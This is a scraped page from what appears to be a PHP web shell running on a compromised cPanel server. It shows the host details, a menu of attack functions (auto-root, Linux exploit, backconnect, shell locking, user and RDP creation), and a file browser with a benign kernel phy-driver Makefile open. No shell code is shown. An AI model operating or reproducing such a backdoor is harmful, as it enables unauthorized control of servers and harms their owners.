Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.179.186
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-25 /
drivers /
phy /
[ HOME SHELL ]
Name
Size
Permission
Action
allwinner
[ DIR ]
drwxr-xr-x
amlogic
[ DIR ]
drwxr-xr-x
broadcom
[ DIR ]
drwxr-xr-x
cadence
[ DIR ]
drwxr-xr-x
freescale
[ DIR ]
drwxr-xr-x
hisilicon
[ DIR ]
drwxr-xr-x
ingenic
[ DIR ]
drwxr-xr-x
intel
[ DIR ]
drwxr-xr-x
lantiq
[ DIR ]
drwxr-xr-x
marvell
[ DIR ]
drwxr-xr-x
mediatek
[ DIR ]
drwxr-xr-x
microchip
[ DIR ]
drwxr-xr-x
motorola
[ DIR ]
drwxr-xr-x
mscc
[ DIR ]
drwxr-xr-x
qualcomm
[ DIR ]
drwxr-xr-x
ralink
[ DIR ]
drwxr-xr-x
renesas
[ DIR ]
drwxr-xr-x
rockchip
[ DIR ]
drwxr-xr-x
samsung
[ DIR ]
drwxr-xr-x
socionext
[ DIR ]
drwxr-xr-x
st
[ DIR ]
drwxr-xr-x
tegra
[ DIR ]
drwxr-xr-x
ti
[ DIR ]
drwxr-xr-x
xilinx
[ DIR ]
drwxr-xr-x
Kconfig
2.87
KB
-rw-r--r--
Makefile
888
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile for the phy drivers. # obj-$(CONFIG_GENERIC_PHY) += phy-core.o obj-$(CONFIG_GENERIC_PHY_MIPI_DPHY) += phy-core-mipi-dphy.o obj-$(CONFIG_PHY_CAN_TRANSCEIVER) += phy-can-transceiver.o obj-$(CONFIG_PHY_LPC18XX_USB_OTG) += phy-lpc18xx-usb-otg.o obj-$(CONFIG_PHY_XGENE) += phy-xgene.o obj-$(CONFIG_PHY_PISTACHIO_USB) += phy-pistachio-usb.o obj-$(CONFIG_USB_LGM_PHY) += phy-lgm-usb.o obj-y += allwinner/ \ amlogic/ \ broadcom/ \ cadence/ \ freescale/ \ hisilicon/ \ ingenic/ \ intel/ \ lantiq/ \ marvell/ \ mediatek/ \ microchip/ \ motorola/ \ mscc/ \ qualcomm/ \ ralink/ \ renesas/ \ rockchip/ \ samsung/ \ socionext/ \ st/ \ tegra/ \ ti/ \ xilinx/
Close